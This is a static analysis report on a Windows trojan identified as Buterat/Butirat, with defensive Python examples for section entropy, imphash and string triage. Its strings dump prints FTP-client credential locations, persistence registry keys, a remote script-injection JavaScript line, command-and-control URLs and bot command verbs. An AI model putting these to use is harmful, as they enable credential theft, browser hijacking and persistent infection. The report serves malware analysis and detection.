PE Compile Time

2012-12-02 15:38:18

This is the TimeDateStamp from the PE file header. It is written by the linker and can be set to any value, so treat it as a claim about when the sample was built rather than as evidence.

PE Imphash

1db674aa41c8b017c09ab688b75ba41b

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x0000cc68    0x0000ce00        6.63491307637
.rdata  0x0000e000       0x0000210a    0x00002200        4.42315500058
.data   0x00011000       0x0001793c    0x00000200        3.61727362724

.data occupies 0x200 bytes in the file against 0x1793c bytes in memory, so nearly all of it is zero-filled at load (uninitialised globals and buffers). The .text entropy of 6.63 is within the range of ordinary compiled x86 code; packed or encrypted sections usually sit above 7.0, so the layout shows no sign of a packer, which is consistent with the import table below being fully readable.
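A check a practitioner would run on a section table like this one, as an added example rather than code from the report or from the tool that produced it: shannon_entropy reproduces the Entropy column from a section's raw bytes, and section_findings flags high entropy, large zero-filled tails and layout inconsistencies. The 0x1000 section alignment and the 7.0 packing threshold are assumptions of the example (the report does not print the optional header); the section values are copied from the table above.

```python
import math
from typing import Dict, List, Tuple

# Section table as printed in the report: name, VirtualAddress, VirtualSize,
# SizeOfRawData, reported entropy (constructed input, copied from the table above).
SECTIONS: List[Tuple[str, int, int, int, float]] = [
    (".text",  0x00001000, 0x0000cc68, 0x0000ce00, 6.63491307637),
    (".rdata", 0x0000e000, 0x0000210a, 0x00002200, 4.42315500058),
    (".data",  0x00011000, 0x0001793c, 0x00000200, 3.61727362724),
]

SECTION_ALIGNMENT = 0x1000  # assumed; the report does not print the optional header
PACKED_ENTROPY = 7.0        # common triage threshold for "probably packed", not a hard rule


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes.
    This is the measure behind the Entropy column; feed it a section's raw bytes
    (pefile: section.get_data()) to reproduce those numbers."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def align_up(value: int, alignment: int) -> int:
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def section_findings(sections=SECTIONS, alignment=SECTION_ALIGNMENT,
                     packed=PACKED_ENTROPY) -> Dict[str, List[str]]:
    """Per-section triage notes: entropy above the packing threshold, a virtual
    size larger than the data on disk, and whether each section starts where the
    previous one, rounded up to the section alignment, ends."""
    findings: Dict[str, List[str]] = {}
    for i, (name, va, vsize, rawsize, entropy) in enumerate(sections):
        notes: List[str] = []
        if entropy >= packed:
            notes.append("entropy %.2f: possibly packed or encrypted" % entropy)
        if vsize > rawsize:
            notes.append("%#x of %#x bytes are zero-filled at load"
                         % (vsize - rawsize, vsize))
        if i + 1 < len(sections):
            expected_next = va + align_up(vsize, alignment)
            if sections[i + 1][1] != expected_next:
                notes.append("next section does not start at %#x" % expected_next)
        findings[name] = notes
    return findings


if __name__ == "__main__":
    for name, notes in section_findings().items():
        print(name, notes or ["ok"])
```

On the table above this reports nothing for .text and .rdata and one note for .data (the zero-filled tail); a packed sample would typically show a high-entropy section and a tiny import table instead.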

Imports

Each entry is the import address table (IAT) slot followed by the imported symbol. The slots are 4 bytes apart, and the addresses below are not contiguous (KERNEL32, for example, jumps from 0x40e020 to 0x40e028), so this is a filtered subset of the import table; the omitted names (GetPrivateProfileStringW, CreateWaitableTimerW, SetUnhandledExceptionFilter and others) are visible in the strings dump further down. The imphash above was computed over the complete table and will not reproduce from this list.

Library WININET.dll:
0x40e178 HttpSendRequestW
0x40e17c InternetConnectW
0x40e180 HttpOpenRequestW
0x40e188 InternetCloseHandle
0x40e190 InternetOpenW
0x40e194 InternetReadFile
0x40e19c InternetOpenUrlW
0x40e1a4 InternetSetOptionW
Library SHLWAPI.dll:
0x40e124 StrStrIW
0x40e128 PathMatchSpecW
0x40e12c PathCombineW
0x40e130 wvnsprintfW
0x40e134 StrStrIA
0x40e138 PathRemoveFileSpecW
Library KERNEL32.dll:
0x40e01c TerminateProcess
0x40e020 GetCurrentProcess
0x40e028 IsDebuggerPresent
0x40e02c GetVersionExA
0x40e030 GetFileSize
0x40e034 RtlUnwind
0x40e038 WideCharToMultiByte
0x40e03c MultiByteToWideChar
0x40e040 HeapCreate
0x40e044 CopyFileW
0x40e048 CreateThread
0x40e050 DeleteFileW
0x40e054 CreateProcessW
0x40e05c GetLastError
0x40e060 ExitProcess
0x40e064 LoadLibraryW
0x40e068 GetProcAddress
0x40e06c Sleep
0x40e070 VirtualProtect
0x40e080 SetFilePointer
0x40e084 SetEndOfFile
0x40e088 HeapAlloc
0x40e08c GetVersionExW
0x40e090 SetWaitableTimer
0x40e09c HeapFree
0x40e0a0 ReadFile
0x40e0a4 FindNextFileW
0x40e0a8 GetModuleFileNameW
0x40e0ac WaitForSingleObject
0x40e0b4 GetFileTime
0x40e0b8 CreateFileW
0x40e0bc GetTickCount
0x40e0c0 CloseHandle
0x40e0c4 GetFileSizeEx
0x40e0c8 VirtualFree
0x40e0cc GetProcessHeap
0x40e0d4 VirtualAlloc
0x40e0d8 HeapReAlloc
0x40e0dc GetSystemTime
0x40e0e0 VirtualQuery
0x40e0e4 FindClose
0x40e0e8 WriteFile
0x40e0ec GetLocalTime
0x40e0f0 FindFirstFileW
0x40e0f4 GetModuleHandleW
0x40e0f8 OpenMutexW
0x40e0fc GetCommandLineW
0x40e100 CreateMutexW
Library USER32.dll:
0x40e140 GetWindowLongW
0x40e144 DispatchMessageW
0x40e148 GetForegroundWindow
0x40e14c CharLowerW
0x40e150 CreateWindowExW
0x40e154 FindWindowW
0x40e158 PeekMessageW
0x40e15c SetForegroundWindow
0x40e160 GetSystemMetrics
0x40e164 MessageBoxW
0x40e168 SetWindowPos
0x40e16c SetWindowLongW
0x40e170 SetParent
Library ADVAPI32.dll:
0x40e000 RegCloseKey
0x40e004 RegOpenKeyExW
0x40e008 RegQueryValueExW
0x40e00c RegSetValueExW
0x40e010 RegCreateKeyExW
0x40e014 RegEnumKeyExW
Library SHELL32.dll:
0x40e11c SHGetFolderPathW
Library ole32.dll:
0x40e1ac CoCreateInstance
0x40e1b0 OleInitialize
0x40e1b4 CoInitialize
Library OLEAUT32.dll:
0x40e108 SysAllocString
0x40e10c VariantInit
0x40e110 SysFreeString
0x40e114 VariantClear
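How the imphash at the top of the report is derived, and why it cannot be recomputed from the list above, as an added example and not code from the report or its tooling: imphash() implements the pefile algorithm on an ordered import list, iat_gaps() finds slots with no listed symbol in a printed table, and partial_table_hash() shows that hashing only the visible entries yields a different value. Only WININET and ADVAPI32 are copied in as constructed input; the function names, addresses and reported hash come from the report, everything else (function and variable names, the slot size) is this example's own.

```python
import hashlib
from typing import Dict, List, Tuple

REPORTED_IMPHASH = "1db674aa41c8b017c09ab688b75ba41b"  # value printed in the report

# Two libraries copied from the import table above as constructed input:
# library -> [(IAT slot address, function name)], in the order printed.
IAT: Dict[str, List[Tuple[int, str]]] = {
    "WININET.dll": [
        (0x40e178, "HttpSendRequestW"), (0x40e17c, "InternetConnectW"),
        (0x40e180, "HttpOpenRequestW"), (0x40e188, "InternetCloseHandle"),
        (0x40e190, "InternetOpenW"), (0x40e194, "InternetReadFile"),
        (0x40e19c, "InternetOpenUrlW"), (0x40e1a4, "InternetSetOptionW"),
    ],
    "ADVAPI32.dll": [
        (0x40e000, "RegCloseKey"), (0x40e004, "RegOpenKeyExW"),
        (0x40e008, "RegQueryValueExW"), (0x40e00c, "RegSetValueExW"),
        (0x40e010, "RegCreateKeyExW"), (0x40e014, "RegEnumKeyExW"),
    ],
}


def imphash(imports: List[Tuple[str, str]]) -> str:
    """Import hash as pefile computes it: one 'library.function' token per
    import in import-table order, lower-cased, with a .dll/.ocx/.sys suffix
    stripped from the library name, joined with ',' and MD5-hashed. pefile
    names ordinal-only imports 'ord<N>' unless the library is one it knows
    (oleaut32, ws2_32, wsock32), where it resolves the ordinal to a name first;
    this example takes the names as given and skips that resolution."""
    tokens = []
    for lib, func in imports:
        lib = lib.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        tokens.append("%s.%s" % (lib, func.lower()))
    return hashlib.md5(",".join(tokens).encode("ascii")).hexdigest()


def iat_gaps(entries: List[Tuple[int, str]], slot_size: int = 4) -> List[int]:
    """IAT slots between the first and last listed address that carry no
    symbol. A 32-bit IAT is a dense array of 4-byte thunks, so any hole means
    the list omits an import."""
    addrs = sorted(addr for addr, _ in entries)
    present = set(addrs)
    return [a for a in range(addrs[0], addrs[-1] + slot_size, slot_size)
            if a not in present]


def partial_table_hash(iat: Dict[str, List[Tuple[int, str]]] = IAT) -> str:
    """imphash over only the imports visible in the report, in printed order."""
    flat = [(lib, func) for lib, entries in iat.items() for _, func in entries]
    return imphash(flat)


def reported_hash_reproducible(iat: Dict[str, List[Tuple[int, str]]] = IAT) -> bool:
    """True only when every library's IAT range is fully accounted for."""
    return not any(iat_gaps(entries) for entries in iat.values())


if __name__ == "__main__":
    for lib, entries in IAT.items():
        print(lib, ["%#x" % a for a in iat_gaps(entries)] or "complete")
    print("reproducible:", reported_hash_reproducible())
```

WININET has four unlisted slots (0x40e184, 0x40e18c, 0x40e198, 0x40e1a0), which matches the four WININET names that appear only in the strings dump; ADVAPI32 is complete. Since the hash depends on every import and its order, the visible subset is not enough to check the reported value, and a pivot on that imphash should be done from the original binary.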

Strings

!This program cannot be run in DOS mode.
`.rdata
@.data
VC20XC00U
AtlAxWinInit
AtlAxAttachControl
AtlAxGetControl
;password=
;user=
;port=
;server=
__scMMdj490)0-Osd
InternetQueryDataAvailable
InternetOpenUrlW
InternetCloseHandle
InternetAttemptConnect
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
InternetSetOptionW
HttpOpenRequestW
InternetSetPerSiteCookieDecisionW
InternetClearAllPerSiteCookieDecisions
WININET.dll
StrStrIA
PathRemoveFileSpecW
StrStrIW
PathMatchSpecW
PathCombineW
wvnsprintfW
SHLWAPI.dll
DeleteFileW
CreateProcessW
SetUnhandledExceptionFilter
GetLastError
ExitProcess
LoadLibraryW
GetProcAddress
VirtualProtect
GetPrivateProfileIntW
ExpandEnvironmentStringsW
GetPrivateProfileStringW
SetFilePointer
SetEndOfFile
HeapAlloc
GetVersionExW
SetWaitableTimer
SystemTimeToFileTime
CreateWaitableTimerW
HeapFree
ReadFile
FindNextFileW
GetModuleFileNameW
WaitForSingleObject
GetTimeZoneInformation
GetFileTime
CreateFileW
GetTickCount
CloseHandle
GetFileSizeEx
VirtualFree
GetProcessHeap
GetCurrentDirectoryW
VirtualAlloc
HeapReAlloc
GetSystemTime
GetFileSize
FindClose
WriteFile
GetLocalTime
FindFirstFileW
GetModuleHandleW
OpenMutexW
GetCommandLineW
CreateMutexW
WaitForMultipleObjects
CreateThread
CopyFileW
HeapCreate
MultiByteToWideChar
WideCharToMultiByte
KERNEL32.dll
GetSystemMetrics
MessageBoxW
SetWindowPos
SetWindowLongW
PeekMessageW
GetWindowLongW
DispatchMessageW
GetForegroundWindow
CharLowerW
CreateWindowExW
FindWindowW
SetParent
SetForegroundWindow
USER32.dll
RegEnumKeyExW
RegCloseKey
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RegCreateKeyExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
CoCreateInstance
OleInitialize
CoInitialize
ole32.dll
OLEAUT32.dll
RtlUnwind
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
GetVersionExA
VirtualQuery
&ref=%s&real_refer=%s
&real_refer=%s
&condition_id=
&kwtype=
&ref=%s
From: true
^client=
From:
lfolder
SOFTWARE\smartftp\client 2.0\settings\backup
personal favorites
SOFTWARE\smartftp\client 2.0\settings\general\favorites
Password
FavoriteItem
ftp*commander*
ftplist.txt
portnumber
SOFTWARE\martin prikryl\winscp 2\sessions
hostname
SOFTWARE\Far2\Plugins\ftp\hosts
SOFTWARE\Far\Plugins\ftp\hosts
*filezilla*
/*/*/Server
*ghisler*
*total*commander*
*totalcmd*
installdir
ftpininame
SOFTWARE\Ghisler\Total Commander
password
username
default
connections
wcx_ftp.ini
*flashfxp*
datafolder
SOFTWARE\FlashFXP\3
history.dat
quick.dat
sites.dat
yA36zA48dEhfrvghGRg57h5UlDv3
ftp://%S:%S@%S:%u
ftp://%s:%s@%s
ftp://%s:%s@%s:%u
PriorHost
TimeCorr
UniqueNum
http://
AppEvents\Schemes\Apps\Explorer\Navigating\.current
SOFTWARE\Classes\MIME\Database\Content Type\
text/html
application/x-javascript
text/javascript
SOFTWARE\Microsoft\Internet Explorer
JOB FILE
^nocrypt
Page generated at:
setvar
msec1970
b_nav_time
Software\Microsoft\Windows NT\CurrentVersion\Windows
AppInit_DLLs
C:\WINDOWS\system32\gbdwpbm.dll
var scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);
&host=
track_events
javascript
begun.ru/click.jsp?url=
an.yandex.ru/count
_blank
"domain"
"encrypted"
"condition_id"
"kwtype"
<domain>
</domain>
</url>
<title>
</title>
http://click0
Shell.Explorer
AtlAxWin
eventConn
Shell_TrayWnd
Accept: */*
Referer:
Accept-Language: ru-RU
Accept-Encoding: gzip, deflate
User-Agent:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%SystemRoot%\System32\%s.exe
%APPDATA%\%s.exe
/updatefile3
\netprotdrvss.exe
job^rev=%s^os=%s
http://ow5dirasuek.com/
http://mkkuei4kdsz.com/
http://gysopui.net/
http://gysopui.net/
begun.ru
confirm^rev=%s^code=%s^param=%s^os=%s
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
^rcn=1
ZORKASITE
BEGUNFEED
REKLOSOFT
TEASERNET
LUXUPXML
SUPERPOISK
DIRECTST
LIVINETCH
UPDATE
DOWNRUN
CLIENTDEL
PRIORITYHOST
GRABFTPS
RECONNECT
COOKREJCT
DESTROY
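The strings above give the capability picture without running the sample: registry and file locations of FTP clients (SmartFTP, WinSCP, FAR, FileZilla, Total Commander, FlashFXP) next to an ftp://user:password@host format string, the Run key and AppInit_DLLs paths, a DOM script-injection snippet hosted in a Shell.Explorer/AtlAxWin control, three C2 URLs, '^'-delimited beacon formats and a list of upper-case command verbs. The following Python is an added example, not code from the report or its tooling: it turns that reading into checkable triage over a constructed subset of the strings. The capability tags, the regexes, the min_hits threshold and all function names are this example's own, and parse_beacon assumes the wire format is exactly what the format strings suggest.

```python
import re
from typing import Dict, List

# Constructed input: a subset of the strings dump above, copied verbatim.
STRINGS: List[str] = [
    r"SOFTWARE\smartftp\client 2.0\settings\general\favorites",
    r"SOFTWARE\martin prikryl\winscp 2\sessions",
    r"SOFTWARE\Far\Plugins\ftp\hosts",
    "*filezilla*",
    r"SOFTWARE\Ghisler\Total Commander",
    "wcx_ftp.ini",
    r"SOFTWARE\FlashFXP\3",
    "sites.dat",
    "ftp://%s:%s@%s:%u",
    r"Software\Microsoft\Windows NT\CurrentVersion\Windows",
    "AppInit_DLLs",
    r"C:\WINDOWS\system32\gbdwpbm.dll",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"%APPDATA%\%s.exe",
    'var scr= document.createElement("script"); scr.src = "%s"; '
    'document.getElementsByTagName("head")[0].appendChild(scr);',
    "Shell.Explorer",
    "AtlAxWin",
    "http://ow5dirasuek.com/",
    "http://mkkuei4kdsz.com/",
    "http://gysopui.net/",
    "http://click0",
    "job^rev=%s^os=%s",
    "GRABFTPS",
    "DESTROY",
]

# Capability rules of this example: tag -> regexes matched against each string.
RULES: Dict[str, List[str]] = {
    "ftp-credential-theft": [
        r"smartftp", r"winscp", r"Far\\Plugins\\ftp", r"filezilla",
        r"Ghisler|wcx_ftp\.ini", r"FlashFXP|sites\.dat", r"^ftp://%s:%s@",
    ],
    "persistence-appinit-dlls": [r"^AppInit_DLLs$", r"CurrentVersion\\Windows$"],
    "persistence-run-key": [r"CurrentVersion\\Run$", r"^%APPDATA%\\%s\.exe$"],
    "browser-script-injection": [
        r'document\.createElement\("script"\)', r"^Shell\.Explorer$", r"^AtlAxWin$",
    ],
}

# Command verbs listed at the end of the strings dump (copied from the report).
COMMANDS = ["ZORKASITE", "BEGUNFEED", "REKLOSOFT", "TEASERNET", "LUXUPXML",
            "SUPERPOISK", "DIRECTST", "LIVINETCH", "UPDATE", "DOWNRUN", "CLIENTDEL",
            "PRIORITYHOST", "GRABFTPS", "RECONNECT", "COOKREJCT", "DESTROY"]


def capabilities(strings: List[str] = STRINGS, rules: Dict[str, List[str]] = RULES,
                 min_hits: int = 1) -> Dict[str, List[str]]:
    """Tag -> evidence strings. A tag is reported when at least min_hits of its
    patterns matched something; raise min_hits to demand corroboration."""
    out: Dict[str, List[str]] = {}
    for tag, patterns in rules.items():
        hits, evidence = 0, []
        for pat in patterns:
            rx = re.compile(pat, re.IGNORECASE)
            matched = [s for s in strings if rx.search(s)]
            if matched:
                hits += 1
                evidence.extend(m for m in matched if m not in evidence)
        if hits >= min_hits:
            out[tag] = evidence
    return out


def c2_hosts(strings: List[str] = STRINGS) -> List[str]:
    """Hostnames from fully formed http(s) URLs; truncated fragments such as
    'http://click0' (no path) are left out rather than guessed at."""
    rx = re.compile(r"^https?://([A-Za-z0-9.-]+)/")
    hosts = set()
    for s in strings:
        m = rx.match(s)
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)


def parse_beacon(msg: str) -> Dict[str, str]:
    """Split a '^'-delimited message such as job^rev=%s^os=%s or
    confirm^rev=%s^code=%s^param=%s^os=%s: the first token is the verb, the
    rest are key=value pairs, and bare flags like ^nocrypt keep an empty value.
    That the bot emits exactly this layout is an assumption read off the format
    strings, not something the report confirms."""
    verb, *fields = msg.split("^")
    parsed = {"verb": verb}
    for field in fields:
        key, _, value = field.partition("=")
        parsed[key] = value
    return parsed
```

With min_hits=1 all four tags fire; with min_hits=3 only the FTP-theft and script-injection tags survive, which is the kind of corroboration threshold worth applying before a string-based verdict goes into a ticket. The same rules can be carried over into a YARA rule once the evidence strings have been checked for uniqueness against clean software.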
No antivirus signatures available.
IRMA Signature

Engine                        Platform  Result
Trend Micro SProtect          Linux     Clean
Avast Core Security           Linux     Win32:Buterat-WQ [Trj]
C4S ClamAV                    Linux     Win.Malware.Ulise-7170100-0
Trellix                       Linux     GenericRXHT-PZ
Sophos Anti-Virus             Linux     Troj/Buterat-E
Bitdefender Antivirus         Linux     Generic.Dacic.1A7FA519.A.6CC4144B
G Data Antivirus              Windows   Virus: Generic.Dacic.1A7FA519.A.6CC4144B (Engine A), Win32.Trojan.PSE.14IDQ4O (Engine B)
WithSecure                    Linux     Heuristic.HEUR/AGEN.1366724
ESET Security                 Windows   a variant of Win32/SpyVoltar.B trojan
DrWeb Antivirus               Linux     BackDoor.Butirat.245
ClamAV                        Linux     Clean
eScan Antivirus               Linux     Generic.Dacic.1A7FA519.A.6CC4144B(DB)
Kaspersky Standard            Windows   VHO:Trojan-Downloader.Win32.Agent.gen
Emsisoft Commandline Scanner  Windows   Generic.Dacic.1A7FA519.A.6CC4144B (B)